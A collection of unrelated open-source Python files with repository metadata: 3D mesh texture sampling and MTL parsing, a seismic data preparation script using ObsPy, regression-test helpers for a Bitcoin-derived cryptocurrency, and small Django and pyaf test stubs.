(R, R, 3) slc = torch.arange(2, device=device)[:, None] # w0, w1 bary[below_diag, slc] = ((grid[below_diag] + 1.0 / 3.0) / R).T # w0, w1 for above diagonal grid cells. # pyre-fixme[16]: `float` has no attribute `T`. bary[~below_diag, slc] = (((R - 1.0 - grid[~below_diag]) + 2.0 / 3.0) / R).T # w2 = 1. - w0 - w1 bary[..., -1] = 1 - bary[..., :2].sum(dim=-1) # Calculate the uv position in the image for each pixel # in the per face texture map # (F, 1, 1, 3, 2) * (R, R, 3, 1) -> (F, R, R, 3, 2) -> (F, R, R, 2) uv_pos = (faces_verts_uvs[:, None, None] * bary[..., None]).sum(-2) # bi-linearly interpolate the textures from the images # using the uv coordinates given by uv_pos. textures = _bilinear_interpolation_vectorized(image, uv_pos) return textures def _bilinear_interpolation_vectorized( image: torch.Tensor, grid: torch.Tensor ) -> torch.Tensor: """ Bi linearly interpolate the image using the uv positions in the flow-field grid (following the naming conventions for torch.nn.functional.grid_sample). This implementation uses the same steps as in the SoftRas cuda kernel to make it easy to compare. This vectorized version requires less memory than _bilinear_interpolation_grid_sample but is slightly slower. If speed is an issue and the number of faces in the mesh and texture image sizes are small, consider using _bilinear_interpolation_grid_sample instead. Args: image: FloatTensor of shape (H, W, D) a single image/input tensor with D channels. grid: FloatTensor of shape (N, R, R, 2) giving the pixel locations of the points at which to sample a value in the image. The grid values must be in the range [0, 1]. u is the x direction and v is the y direction. Returns: out: FloatTensor of shape (N, H, W, D) giving the interpolated D dimensional value from image at each of the pixel locations in grid. """ H, W, _ = image.shape # Convert [0, 1] to the range [0, W-1] and [0, H-1] grid = grid * torch.tensor([W - 1, H - 1]).type_as(grid) weight_1 = grid - grid.int() weight_0 = 1.0 - weight_1 grid_x, grid_y = grid.unbind(-1) y0 = grid_y.to(torch.int64) y1 = (grid_y + 1).to(torch.int64) x0 = grid_x.to(torch.int64) x1 = x0 + 1 weight_x0, weight_y0 = weight_0.unbind(-1) weight_x1, weight_y1 = weight_1.unbind(-1) # Bi-linear interpolation # griditions = [[y, x], [(y+1), x] # [y, (x+1)], [(y+1), (x+1)]] # weights = [[wx0*wy0, wx0*wy1], # [wx1*wy0, wx1*wy1]] out = ( image[y0, x0] * (weight_x0 * weight_y0)[..., None] + image[y1, x0] * (weight_x0 * weight_y1)[..., None] + image[y0, x1] * (weight_x1 * weight_y0)[..., None] + image[y1, x1] * (weight_x1 * weight_y1)[..., None] ) return out def _bilinear_interpolation_grid_sample( image: torch.Tensor, grid: torch.Tensor ) -> torch.Tensor: """ Bi linearly interpolate the image using the uv positions in the flow-field grid (following the conventions for torch.nn.functional.grid_sample). This implementation is faster than _bilinear_interpolation_vectorized but requires more memory so can cause OOMs. If speed is an issue try this function instead. Args: image: FloatTensor of shape (H, W, D) a single image/input tensor with D channels. grid: FloatTensor of shape (N, R, R, 2) giving the pixel locations of the points at which to sample a value in the image. The grid values must be in the range [0, 1]. u is the x direction and v is the y direction. Returns: out: FloatTensor of shape (N, H, W, D) giving the interpolated D dimensional value from image at each of the pixel locations in grid. """ N = grid.shape[0] # convert [0, 1] to the range [-1, 1] expected by grid_sample. grid = grid * 2.0 - 1.0 image = image.permute(2, 0, 1)[None, ...].expand(N, -1, -1, -1) # (N, 3, H, W) # Align_corners has to be set to True to match the output of the SoftRas # cuda kernel for bilinear sampling. out = F.grid_sample(image, grid, mode="bilinear", align_corners=True) return out.permute(0, 2, 3, 1) MaterialProperties = Dict[str, Dict[str, torch.Tensor]] TextureFiles = Dict[str, str] TextureImages = Dict[str, torch.Tensor] def _parse_mtl(f, device="cpu") -> Tuple[MaterialProperties, TextureFiles]: material_properties = {} texture_files = {} material_name = "" with _open_file(f, "r") as f: for line in f: tokens = line.strip().split() if not tokens: continue if tokens[0] == "newmtl": material_name = tokens[1] material_properties[material_name] = {} elif tokens[0] == "map_Kd": # Diffuse texture map # Account for the case where filenames might have spaces filename = line.strip()[7:] texture_files[material_name] = filename elif tokens[0] == "Kd": # RGB diffuse reflectivity kd = np.array(tokens[1:4]).astype(np.float32) kd = torch.from_numpy(kd).to(device) material_properties[material_name]["diffuse_color"] = kd elif tokens[0] == "Ka": # RGB ambient reflectivity ka = np.array(tokens[1:4]).astype(np.float32) ka = torch.from_numpy(ka).to(device) material_properties[material_name]["ambient_color"] = ka elif tokens[0] == "Ks": # RGB specular reflectivity ks = np.array(tokens[1:4]).astype(np.float32) ks = torch.from_numpy(ks).to(device) material_properties[material_name]["specular_color"] = ks elif tokens[0] == "Ns": # Specular exponent ns = np.array(tokens[1:4]).astype(np.float32) ns = torch.from_numpy(ns).to(device) material_properties[material_name]["shininess"] = ns return material_properties, texture_files def _load_texture_images( material_names: List[str], data_dir: str, material_properties: MaterialProperties, texture_files: TextureFiles, ) -> Tuple[MaterialProperties, TextureImages]: final_material_properties = {} texture_images = {} # Only keep the materials referenced in the obj. for material_name in material_names: if material_name in texture_files: # Load the texture image. path = os.path.join(data_dir, texture_files[material_name]) if os.path.isfile(path): image = _read_image(path, format="RGB") / 255.0 image = torch.from_numpy(image) texture_images[material_name] = image else: msg = f"Texture file does not exist: {path}" warnings.warn(msg) if material_name in material_properties: final_material_properties[material_name] = material_properties[ material_name ] return final_material_properties, texture_images def load_mtl( f, material_names: List[str], data_dir: str, device="cpu" ) -> Tuple[MaterialProperties, TextureImages]: """ Load texture images and material reflectivity values for ambient, diffuse and specular light (Ka, Kd, Ks, Ns). Args: f: a file-like object of the material information. material_names: a list of the material names found in the .obj file. data_dir: the directory where the material texture files are located. Returns: material_properties: dict of properties for each material. If a material does not have any properties it will have an empty dict. { material_name_1: { "ambient_color": tensor of shape (1, 3), "diffuse_color": tensor of shape (1, 3), "specular_color": tensor of shape (1, 3), "shininess": tensor of shape (1) }, material_name_2: {}, ... } texture_images: dict of material names and texture images { material_name_1: (H, W, 3) image, ... } """ material_properties, texture_files = _parse_mtl(f, device) return _load_texture_images( material_names, data_dir, material_properties, texture_files )
dbbdd80325b36ade3a92fc51452029f8d9e7b58e
d4ca03693383a5bc20bcdf7b7d552bba1d5467ff
/prepare_3comp.py
c3f7453dccf62501b6eac3430daf838f8eb00c62
[]
no_license
samhaug/beamform_code
abaa1c723fec6143523b4bf8c05e7daa2655584d
3bb201356056c1ee91a141b057ff7c666171de2a
refs/heads/master
2023-01-19T22:15:02.272484
2020-11-24T23:05:47
2020-11-24T23:05:47
289,100,877
0
0
null
null
null
null
UTF-8
Python
false
false
5,717
py
import obspy from os.path import isdir from subprocess import call from obspy.taup import TauPyModel import numpy as np from matplotlib import pyplot as plt model = TauPyModel(model='prem') if not isdir("./z_comp"): call("mkdir ./z_comp",shell=True) if not isdir("./e_comp"): call("mkdir ./e_comp",shell=True) if not isdir("./n_comp"): call("mkdir ./n_comp",shell=True) print('reading') z = obspy.read('data/*BHZ*') n = obspy.read('data/*BHN*') e = obspy.read('data/*BHE*') print('read') z_l = [] n_l = [] e_l = [] all_l = [] z.interpolate(6) n.interpolate(6) e.interpolate(6) #z.filter('bandpass',freqmin=1/100.,freqmax=1./5,zerophase=True) #n.filter('bandpass',freqmin=1/100.,freqmax=1./5,zerophase=True) #e.filter('bandpass',freqmin=1/100.,freqmax=1./5,zerophase=True) z.detrend() n.detrend() e.detrend() # Trim data to numsamp samples. Remove shorter traces numsamp=3882 z_netw=[] z_stat=[] z_loc=[] for idx,tr in enumerate(z): z[idx].data = z[idx].data[0:numsamp] if len(z[idx].data) != numsamp: z_stat.append(z[idx].stats.station) z_netw.append(z[idx].stats.network) z_loc.append(z[idx].stats.location) for ii in range(0,len(z_netw)): z.remove(z.select(station=z_stat[ii],network=z_netw[ii],location=z_loc[ii])[0]) n_netw=[] n_stat=[] n_loc=[] for idx,tr in enumerate(n): n[idx].data = n[idx].data[0:numsamp] if len(n[idx].data) != numsamp: n_stat.append(n[idx].stats.station) n_netw.append(n[idx].stats.network) n_loc.append(n[idx].stats.location) for ii in range(0,len(n_netw)): n.remove(n.select(station=n_stat[ii],network=n_netw[ii],location=n_loc[ii])[0]) e_netw=[] e_stat=[] e_loc=[] for idx,tr in enumerate(e): e[idx].data = e[idx].data[0:numsamp] if len(tr.data) != numsamp: e_stat.append(e[idx].stats.station) e_netw.append(e[idx].stats.network) e_loc.append(e[idx].stats.location) for ii in range(0,len(e_netw)): e.remove(e.select(station=e_stat[ii],network=e_netw[ii],location=e_loc[ii])[0]) #Remove duplicates for tr in z: name = "{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location) if name not in z_l: z_l.append(name) else: z.remove(tr) for tr in n: name = "{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location) if name not in n_l: n_l.append(name) else: n.remove(tr) for tr in e: name = "{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location) if name not in e_l: e_l.append(name) else: e.remove(tr) z_l = [] n_l = [] e_l = [] all_l = [] #Make list of each trace for tr in z: z_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)) all_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)) for tr in n: n_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)) all_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)) for tr in e: e_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)) all_l.append("{}_{}_{}".format(tr.stats.network,tr.stats.station,tr.stats.location)) #Remove traces not common to all three components for i in (set(all_l)-set(z_l)): try: for tr in n.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]): n.remove(tr) except: pass try: for tr in e.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]): e.remove(tr) except: continue for i in (set(all_l)-set(n_l)): try: for tr in z.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]): z.remove(tr) except: pass try: for tr in e.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]): e.remove(tr) except: pass for i in (set(all_l)-set(e_l)): try: for tr in n.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]): n.remove(tr) except: pass try: for tr in z.select(network=i.split('_')[0],station=i.split('_')[1],location=i.split('_')[2]): z.remove(tr) except: pass z.sort(['network','station','location']) n.sort(['network','station','location']) e.sort(['network','station','location']) #print("Aligning on P") #for idx,tr in enumerate(z): # gcarc = tr.stats.sac['gcarc'] # if tr.stats.sac['evdp'] > 1000: # tr.stats.sac['evdp'] *= 1/1000. # h = tr.stats.sac['evdp'] # t = model.get_travel_times(source_depth_in_km=h, # distance_in_degree=gcarc, # phase_list=['ttp'])[0].time # s = tr.stats.sampling_rate # w = tr.data[int((t-20)*s):int((t+20)*s)] # l = int(len(w)/2.) # p1 = np.argmax(np.abs(w)) # z[idx].data = np.roll(z[idx].data,l-p1) # e[idx].data = np.roll(e[idx].data,l-p1) # n[idx].data = np.roll(n[idx].data,l-p1) #z.differentiate() #n.differentiate() #e.differentiate() for tr in z: tr.write('z_comp/{}_{}_{}.sac'.format(tr.stats.network,tr.stats.station,tr.stats.location),format='SAC') for tr in n: if tr.stats.sac['evdp'] > 1000: tr.stats.sac['evdp'] *= 1/1000. tr.write('n_comp/{}_{}_{}.sac'.format(tr.stats.network,tr.stats.station,tr.stats.location),format='SAC') for tr in e: if tr.stats.sac['evdp'] > 1000: tr.stats.sac['evdp'] *= 1/1000. tr.write('e_comp/{}_{}_{}.sac'.format(tr.stats.network,tr.stats.station,tr.stats.location),format='SAC')
4657907d92c2d3cfce0d9eba8af849e653c57d19
fd9d43f9a2826c1c985472d1067317c8d399d3e2
/qa/rpc-tests/test_framework/util.py
ed2771d4601b389047fc4c84faef3b5ffeda8fc0
[ "MIT" ]
permissive
Bankitt-Official/bankitt
006cd394c202ad1f58d253fc4fc2f8c4d1db03a0
ba6ec5c2d7099eeafab972634e9dddd676b0503f
refs/heads/master
2020-03-07T11:08:23.628577
2018-06-09T09:40:25
2018-06-09T09:40:25
127,448,326
0
1
MIT
2018-05-12T06:14:49
2018-03-30T16:16:35
C++
UTF-8
Python
false
false
21,631
py
# Copyright (c) 2014-2015 The Bitcoin Core developers # Copyright (c) 2014-2017 The Bankitt Core developers # Distributed under the MIT/X11 software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # Helpful routines for regression testing # # Add python-bitcoinrpc to module search path: import os import sys from binascii import hexlify, unhexlify from base64 import b64encode from decimal import Decimal, ROUND_DOWN import json import random import shutil import subprocess import time import re import errno from . import coverage from .authproxy import AuthServiceProxy, JSONRPCException COVERAGE_DIR = None #Set Mocktime default to OFF. #MOCKTIME is only needed for scripts that use the #cached version of the blockchain. If the cached #version of the blockchain is used without MOCKTIME #then the mempools will not sync due to IBD. MOCKTIME = 0 def enable_mocktime(): #For backwared compatibility of the python scripts #with previous versions of the cache, set MOCKTIME #to regtest genesis time + (201 * 156) global MOCKTIME MOCKTIME = 1417713337 + (201 * 156) def disable_mocktime(): global MOCKTIME MOCKTIME = 0 def get_mocktime(): return MOCKTIME def enable_coverage(dirname): """Maintain a log of which RPC calls are made during testing.""" global COVERAGE_DIR COVERAGE_DIR = dirname def get_rpc_proxy(url, node_number, timeout=None): """ Args: url (str): URL of the RPC server to call node_number (int): the node number (or id) that this calls to Kwargs: timeout (int): HTTP timeout in seconds Returns: AuthServiceProxy. convenience object for making RPC calls. """ proxy_kwargs = {} if timeout is not None: proxy_kwargs['timeout'] = timeout proxy = AuthServiceProxy(url, **proxy_kwargs) proxy.url = url # store URL on proxy for info coverage_logfile = coverage.get_filename( COVERAGE_DIR, node_number) if COVERAGE_DIR else None return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile) def get_mnsync_status(node): result = node.mnsync("status") return result['IsSynced'] def wait_to_sync(node): synced = False while not synced: synced = get_mnsync_status(node) time.sleep(0.5) def p2p_port(n): return 11000 + n + os.getpid()%999 def rpc_port(n): return 12000 + n + os.getpid()%999 def check_json_precision(): """Make sure json library being used does not lose precision converting BTC values""" n = Decimal("20000000.00000003") satoshis = int(json.loads(json.dumps(float(n)))*1.0e8) if satoshis != 2000000000000003: raise RuntimeError("JSON encode/decode loses precision") def count_bytes(hex_string): return len(bytearray.fromhex(hex_string)) def bytes_to_hex_str(byte_str): return hexlify(byte_str).decode('ascii') def hex_str_to_bytes(hex_str): return unhexlify(hex_str.encode('ascii')) def str_to_b64str(string): return b64encode(string.encode('utf-8')).decode('ascii') def sync_blocks(rpc_connections, wait=1): """ Wait until everybody has the same block count """ while True: counts = [ x.getblockcount() for x in rpc_connections ] if counts == [ counts[0] ]*len(counts): break time.sleep(wait) def sync_mempools(rpc_connections, wait=1): """ Wait until everybody has the same transactions in their memory pools """ while True: pool = set(rpc_connections[0].getrawmempool()) num_match = 1 for i in range(1, len(rpc_connections)): if set(rpc_connections[i].getrawmempool()) == pool: num_match = num_match+1 if num_match == len(rpc_connections): break time.sleep(wait) def sync_masternodes(rpc_connections): for node in rpc_connections: wait_to_sync(node) bitcoind_processes = {} def initialize_datadir(dirname, n): datadir = os.path.join(dirname, "node"+str(n)) if not os.path.isdir(datadir): os.makedirs(datadir) with open(os.path.join(datadir, "bankitt.conf"), 'w') as f: f.write("regtest=1\n") f.write("rpcuser=rt\n") f.write("rpcpassword=rt\n") f.write("port="+str(p2p_port(n))+"\n") f.write("rpcport="+str(rpc_port(n))+"\n") f.write("listenonion=0\n") return datadir def rpc_url(i, rpchost=None): return "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i)) def wait_for_bitcoind_start(process, url, i): ''' Wait for bankittd to start. This means that RPC is accessible and fully initialized. Raise an exception if bankittd exits during initialization. ''' while True: if process.poll() is not None: raise Exception('bankittd exited with status %i during initialization' % process.returncode) try: rpc = get_rpc_proxy(url, i) blocks = rpc.getblockcount() break # break out of loop on success except IOError as e: if e.errno != errno.ECONNREFUSED: # Port not yet open? raise # unknown IO error except JSONRPCException as e: # Initialization phase if e.error['code'] != -28: # RPC in warmup? raise # unkown JSON RPC exception time.sleep(0.25) def initialize_chain(test_dir): """ Create (or copy from cache) a 200-block-long chain and 4 wallets. """ if (not os.path.isdir(os.path.join("cache","node0")) or not os.path.isdir(os.path.join("cache","node1")) or not os.path.isdir(os.path.join("cache","node2")) or not os.path.isdir(os.path.join("cache","node3"))): #find and delete old cache directories if any exist for i in range(4): if os.path.isdir(os.path.join("cache","node"+str(i))): shutil.rmtree(os.path.join("cache","node"+str(i))) # Create cache directories, run bankittds: for i in range(4): datadir=initialize_datadir("cache", i) args = [ os.getenv("BANKITTD", "bankittd"), "-server", "-keypool=1", "-datadir="+datadir, "-discover=0" ] if i > 0: args.append("-connect=127.0.0.1:"+str(p2p_port(0))) bitcoind_processes[i] = subprocess.Popen(args) if os.getenv("PYTHON_DEBUG", ""): print "initialize_chain: bankittd started, waiting for RPC to come up" wait_for_bitcoind_start(bitcoind_processes[i], rpc_url(i), i) if os.getenv("PYTHON_DEBUG", ""): print "initialize_chain: RPC succesfully started" rpcs = [] for i in range(4): try: rpcs.append(get_rpc_proxy(rpc_url(i), i)) except: sys.stderr.write("Error connecting to "+url+"\n") sys.exit(1) # Create a 200-block-long chain; each of the 4 nodes # gets 25 mature blocks and 25 immature. # blocks are created with timestamps 156 seconds apart # starting from 31356 seconds in the past enable_mocktime() block_time = get_mocktime() - (201 * 156) for i in range(2): for peer in range(4): for j in range(25): set_node_times(rpcs, block_time) rpcs[peer].generate(1) block_time += 156 # Must sync before next peer starts generating blocks sync_blocks(rpcs) # Shut them down, and clean up cache directories: stop_nodes(rpcs) wait_bitcoinds() disable_mocktime() for i in range(4): os.remove(log_filename("cache", i, "debug.log")) os.remove(log_filename("cache", i, "db.log")) os.remove(log_filename("cache", i, "peers.dat")) os.remove(log_filename("cache", i, "fee_estimates.dat")) for i in range(4): from_dir = os.path.join("cache", "node"+str(i)) to_dir = os.path.join(test_dir, "node"+str(i)) shutil.copytree(from_dir, to_dir) initialize_datadir(test_dir, i) # Overwrite port/rpcport in bankitt.conf def initialize_chain_clean(test_dir, num_nodes): """ Create an empty blockchain and num_nodes wallets. Useful if a test case wants complete control over initialization. """ for i in range(num_nodes): datadir=initialize_datadir(test_dir, i) def _rpchost_to_args(rpchost): '''Convert optional IP:port spec to rpcconnect/rpcport args''' if rpchost is None: return [] match = re.match('(\[[0-9a-fA-f:]+\]|[^:]+)(?::([0-9]+))?$', rpchost) if not match: raise ValueError('Invalid RPC host spec ' + rpchost) rpcconnect = match.group(1) rpcport = match.group(2) if rpcconnect.startswith('['): # remove IPv6 [...] wrapping rpcconnect = rpcconnect[1:-1] rv = ['-rpcconnect=' + rpcconnect] if rpcport: rv += ['-rpcport=' + rpcport] return rv def start_node(i, dirname, extra_args=None, rpchost=None, timewait=None, binary=None): """ Start a bankittd and return RPC connection to it """ datadir = os.path.join(dirname, "node"+str(i)) if binary is None: binary = os.getenv("BANKITTD", "bankittd") # RPC tests still depend on free transactions args = [ binary, "-datadir="+datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-blockprioritysize=50000", "-mocktime="+str(get_mocktime()) ] if extra_args is not None: args.extend(extra_args) bitcoind_processes[i] = subprocess.Popen(args) if os.getenv("PYTHON_DEBUG", ""): print "start_node: bankittd started, waiting for RPC to come up" url = rpc_url(i, rpchost) wait_for_bitcoind_start(bitcoind_processes[i], url, i) if os.getenv("PYTHON_DEBUG", ""): print "start_node: RPC succesfully started" proxy = get_rpc_proxy(url, i, timeout=timewait) if COVERAGE_DIR: coverage.write_all_rpc_commands(COVERAGE_DIR, proxy) return proxy def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None, binary=None): """ Start multiple bankittds, return RPC connections to them """ if extra_args is None: extra_args = [ None for i in range(num_nodes) ] if binary is None: binary = [ None for i in range(num_nodes) ] rpcs = [] try: for i in range(num_nodes): rpcs.append(start_node(i, dirname, extra_args[i], rpchost, binary=binary[i])) except: # If one node failed to start, stop the others stop_nodes(rpcs) raise return rpcs def log_filename(dirname, n_node, logname): return os.path.join(dirname, "node"+str(n_node), "regtest", logname) def stop_node(node, i): node.stop() bitcoind_processes[i].wait() del bitcoind_processes[i] def stop_nodes(nodes): for node in nodes: node.stop() del nodes[:] # Emptying array closes connections as a side effect def set_node_times(nodes, t): for node in nodes: node.setmocktime(t) def wait_bitcoinds(): # Wait for all bitcoinds to cleanly exit for bitcoind in bitcoind_processes.values(): bitcoind.wait() bitcoind_processes.clear() def connect_nodes(from_connection, node_num): ip_port = "127.0.0.1:"+str(p2p_port(node_num)) from_connection.addnode(ip_port, "onetry") # poll until version handshake complete to avoid race conditions # with transaction relaying while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()): time.sleep(0.1) def connect_nodes_bi(nodes, a, b): connect_nodes(nodes[a], b) connect_nodes(nodes[b], a) def find_output(node, txid, amount): """ Return index to output of txid with value amount Raises exception if there is none. """ txdata = node.getrawtransaction(txid, 1) for i in range(len(txdata["vout"])): if txdata["vout"][i]["value"] == amount: return i raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount))) def gather_inputs(from_node, amount_needed, confirmations_required=1): """ Return a random set of unspent txouts that are enough to pay amount_needed """ assert(confirmations_required >=0) utxo = from_node.listunspent(confirmations_required) random.shuffle(utxo) inputs = [] total_in = Decimal("0.00000000") while total_in < amount_needed and len(utxo) > 0: t = utxo.pop() total_in += t["amount"] inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } ) if total_in < amount_needed: raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in)) return (total_in, inputs) def make_change(from_node, amount_in, amount_out, fee): """ Create change output(s), return them """ outputs = {} amount = amount_out+fee change = amount_in - amount if change > amount*2: # Create an extra change output to break up big inputs change_address = from_node.getnewaddress() # Split change in two, being careful of rounding: outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN) change = amount_in - amount - outputs[change_address] if change > 0: outputs[from_node.getnewaddress()] = change return outputs def send_zeropri_transaction(from_node, to_node, amount, fee): """ Create&broadcast a zero-priority transaction. Returns (txid, hex-encoded-txdata) Ensures transaction is zero-priority by first creating a send-to-self, then using its output """ # Create a send-to-self with confirmed inputs: self_address = from_node.getnewaddress() (total_in, inputs) = gather_inputs(from_node, amount+fee*2) outputs = make_change(from_node, total_in, amount+fee, fee) outputs[self_address] = float(amount+fee) self_rawtx = from_node.createrawtransaction(inputs, outputs) self_signresult = from_node.signrawtransaction(self_rawtx) self_txid = from_node.sendrawtransaction(self_signresult["hex"], True) vout = find_output(from_node, self_txid, amount+fee) # Now immediately spend the output to create a 1-input, 1-output # zero-priority transaction: inputs = [ { "txid" : self_txid, "vout" : vout } ] outputs = { to_node.getnewaddress() : float(amount) } rawtx = from_node.createrawtransaction(inputs, outputs) signresult = from_node.signrawtransaction(rawtx) txid = from_node.sendrawtransaction(signresult["hex"], True) return (txid, signresult["hex"]) def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants): """ Create a random zero-priority transaction. Returns (txid, hex-encoded-transaction-data, fee) """ from_node = random.choice(nodes) to_node = random.choice(nodes) fee = min_fee + fee_increment*random.randint(0,fee_variants) (txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee) return (txid, txhex, fee) def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants): """ Create a random transaction. Returns (txid, hex-encoded-transaction-data, fee) """ from_node = random.choice(nodes) to_node = random.choice(nodes) fee = min_fee + fee_increment*random.randint(0,fee_variants) (total_in, inputs) = gather_inputs(from_node, amount+fee) outputs = make_change(from_node, total_in, amount, fee) outputs[to_node.getnewaddress()] = float(amount) rawtx = from_node.createrawtransaction(inputs, outputs) signresult = from_node.signrawtransaction(rawtx) txid = from_node.sendrawtransaction(signresult["hex"], True) return (txid, signresult["hex"], fee) def assert_equal(thing1, thing2): if thing1 != thing2: raise AssertionError("%s != %s"%(str(thing1),str(thing2))) def assert_greater_than(thing1, thing2): if thing1 <= thing2: raise AssertionError("%s <= %s"%(str(thing1),str(thing2))) def assert_raises(exc, fun, *args, **kwds): try: fun(*args, **kwds) except exc: pass except Exception as e: raise AssertionError("Unexpected exception raised: "+type(e).__name__) else: raise AssertionError("No exception raised") def assert_is_hex_string(string): try: int(string, 16) except Exception as e: raise AssertionError( "Couldn't interpret %r as hexadecimal; raised: %s" % (string, e)) def assert_is_hash_string(string, length=64): if not isinstance(string, basestring): raise AssertionError("Expected a string, got type %r" % type(string)) elif length and len(string) != length: raise AssertionError( "String of length %d expected; got %d" % (length, len(string))) elif not re.match('[abcdef0-9]+$', string): raise AssertionError( "String %r contains invalid characters for a hash." % string) def assert_array_result(object_array, to_match, expected, should_not_find = False): """ Pass in array of JSON objects, a dictionary with key/value pairs to match against, and another dictionary with expected key/value pairs. If the should_not_find flag is true, to_match should not be found in object_array """ if should_not_find == True: assert_equal(expected, { }) num_matched = 0 for item in object_array: all_match = True for key,value in to_match.items(): if item[key] != value: all_match = False if not all_match: continue elif should_not_find == True: num_matched = num_matched+1 for key,value in expected.items(): if item[key] != value: raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value))) num_matched = num_matched+1 if num_matched == 0 and should_not_find != True: raise AssertionError("No objects matched %s"%(str(to_match))) if num_matched > 0 and should_not_find == True: raise AssertionError("Objects were found %s"%(str(to_match))) def satoshi_round(amount): return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN) # Helper to create at least "count" utxos # Pass in a fee that is sufficient for relay and mining new transactions. def create_confirmed_utxos(fee, node, count): node.generate(int(0.5*count)+101) utxos = node.listunspent() iterations = count - len(utxos) addr1 = node.getnewaddress() addr2 = node.getnewaddress() if iterations <= 0: return utxos for i in xrange(iterations): t = utxos.pop() inputs = [] inputs.append({ "txid" : t["txid"], "vout" : t["vout"]}) outputs = {} send_value = t['amount'] - fee outputs[addr1] = satoshi_round(send_value/2) outputs[addr2] = satoshi_round(send_value/2) raw_tx = node.createrawtransaction(inputs, outputs) signed_tx = node.signrawtransaction(raw_tx)["hex"] txid = node.sendrawtransaction(signed_tx) while (node.getmempoolinfo()['size'] > 0): node.generate(1) utxos = node.listunspent() assert(len(utxos) >= count) return utxos # Create large OP_RETURN txouts that can be appended to a transaction # to make it large (helper for constructing large transactions). def gen_return_txouts(): # Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create # So we have big transactions (and therefore can't fit very many into each block) # create one script_pubkey script_pubkey = "6a4d0200" #OP_RETURN OP_PUSH2 512 bytes for i in xrange (512): script_pubkey = script_pubkey + "01" # concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change txouts = "81" for k in xrange(128): # add txout value txouts = txouts + "0000000000000000" # add length of script_pubkey txouts = txouts + "fd0402" # add script_pubkey txouts = txouts + script_pubkey return txouts def create_tx(node, coinbase, to_address, amount): inputs = [{ "txid" : coinbase, "vout" : 0}] outputs = { to_address : amount } rawtx = node.createrawtransaction(inputs, outputs) signresult = node.signrawtransaction(rawtx) assert_equal(signresult["complete"], True) return signresult["hex"] # Create a spend of each passed-in utxo, splicing in "txouts" to each raw # transaction to make it large. See gen_return_txouts() above. def create_lots_of_big_transactions(node, txouts, utxos, fee): addr = node.getnewaddress() txids = [] for i in xrange(len(utxos)): t = utxos.pop() inputs = [] inputs.append({ "txid" : t["txid"], "vout" : t["vout"]}) outputs = {} send_value = t['amount'] - fee outputs[addr] = satoshi_round(send_value) rawtx = node.createrawtransaction(inputs, outputs) newtx = rawtx[0:92] newtx = newtx + txouts newtx = newtx + rawtx[94:] signresult = node.signrawtransaction(newtx, None, None, "NONE") txid = node.sendrawtransaction(signresult["hex"], True) txids.append(txid) return txids def get_bip9_status(node, key): info = node.getblockchaininfo() for row in info['bip9_softforks']: if row['id'] == key: return row raise IndexError ('key:"%s" not found' % key)
fd63524205e878b38ec89f3dc9234285d4d205c8
db24aad1b8e813a23688cfef4603978e3356b155
/fastagram/posts/models/__init__.py
678b999d2e2f24295eb5a61c01ff7b53a8c99bf2
[]
no_license
yevgnenll/fastagram
b251a9f5ce1b6b30c09c3d5ab3d23a7388a35509
0923588e2d6b1e8a2e15bde0e130e64765bcc0ed
refs/heads/develop
2021-01-10T01:14:16.196153
2016-04-06T09:22:18
2016-04-06T09:22:18
54,695,513
2
1
null
2016-04-06T09:22:18
2016-03-25T04:57:31
Python
UTF-8
Python
false
false
75
py
from .post import Post from .comment import Comment from .like import Like
7de8fb97bfda1fbea1f83d3bc24dd88497e0a7b5
d2c4934325f5ddd567963e7bd2bdc0673f92bc40
/tests/model_control/detailed/transf_None/model_control_one_enabled_None_ConstantTrend_Seasonal_Minute_LSTM.py
aac22081d0e2dc667f76605a2ce93909efa6bbb6
[ "BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference" ]
permissive
jmabry/pyaf
797acdd585842474ff4ae1d9db5606877252d9b8
afbc15a851a2445a7824bf255af612dc429265af
refs/heads/master
2020-03-20T02:14:12.597970
2018-12-17T22:08:11
2018-12-17T22:08:11
137,104,552
0
0
BSD-3-Clause
2018-12-17T22:08:12
2018-06-12T17:15:43
Python
UTF-8
Python
false
false
163
py
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod testmod.build_model( ['None'] , ['ConstantTrend'] , ['Seasonal_Minute'] , ['LSTM'] );
a3c3350d331393ea83eede2ee19ca9d984c1bfd0
589385876626ffdf0e3a960a191eed9b90fa6eb2
/trunk/aztk/web/user_homepage.py
0caf42cd3ffc7a4a1681b32a784c6440e5ed2011
[ "BSD-3-Clause" ]
permissive
BGCX261/zoto-server-svn-to-git
bb7545852bd52d6626f3b2b9c0b1d5834eb08201
73abf60264ae5a6b610d19e25be833f0754b160e
refs/heads/master
2021-01-21T23:04:02.366636
2015-08-25T15:16:12
2015-08-25T15:16:12
